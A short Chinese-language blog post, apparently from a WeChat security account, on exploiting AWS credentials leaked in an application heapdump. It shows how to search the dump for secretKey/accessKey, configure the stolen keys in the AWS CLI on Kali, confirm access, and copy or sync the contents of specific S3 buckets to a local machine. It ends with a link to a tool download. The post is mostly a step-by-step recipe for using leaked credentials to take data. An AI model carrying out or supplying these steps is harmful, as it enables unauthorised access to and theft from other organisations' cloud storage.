🌟heapdump中aws key利用，使用云资产管理工具不能下载文件怎么办

❝

前言：本文中涉及到的相关技术或工具仅限技术研究与讨论，严禁用于非法用途，否则产生的一切后果自行承担，如有侵权请私聊删除。 还在学怎么挖通用漏洞和src吗？快来加入星球-考证请加联系vx咨询

在heapdump中aws亚马逊key利用，使用云资产管理工具不能下载，可使用kali中aws工具可连接并下载文件

解决方式

1、发现heapdump中aws亚马逊key

可直接使用模糊搜索

secretKey,accessKey

2、连接云资产管理工具

连接云资产管理工具后不能下载文件

3、kali连接aws工具解决下载问题

通过kali中aws工具

1、配置 AWS CLI配置 AWS CLI 可以通过运行以下命令，输入你的访问密钥和其他相关信息：命令:aws configure命令执行后，会提示你输入以下信息：AWS Access Key ID: 输入获取的 Access Key ID。AWS Secret Access Key: 输入获取的 Secret Access Key。Default region name: 输入希望使用的 AWS 区域（例如 us-west-2、us-east-1、ap-northeast-1 等）。Default output format: 输出格式。常见的格式有 json、text 或 table，通常选择 json。执行 aws configure 后，可能会像这样输入：AWS Access Key ID [None]: AKIAxxxxxxxxxxxxxxAWS Secret Access Key [None]: wJalrxxxxxxxxxxxxxxDefault region name [None]: us-west-2Default output format [None]: json2、验证配置配置完成后，可以通过运行以下命令验证你的配置：命令:aws sts get-caller-identity这会返回当前 AWS 账户的身份信息，类似如下：{"UserId": "AROAEXAMPLE:role/example","Account": "123456789012","Arn": "arn:aws:sts::123456789012:assumed-role/example"}如果能够成功返回信息，说明已成功连接到 AWS。

可通过aws s3 cp 命令下载单个文件

例如

aws s3 cp s3://bgms-jenkins/arsbiztalk/HELP.md ./HELP.md

命令下载想下载的路径文件

也可通过sync命令同步文件和目录的内容，既可以是从本地到S3存储桶，也可以是从S3存储桶到本地

aws s3 sync s3://biztalk-chatbot/ ./local-directory 

获得工具:

链接：https://pan.quark.cn/s/8208bb8f1aa4

原文始发于微信公众号（不秃头的安全）：aws key利用，云资产管理工具不能下载文件怎么办？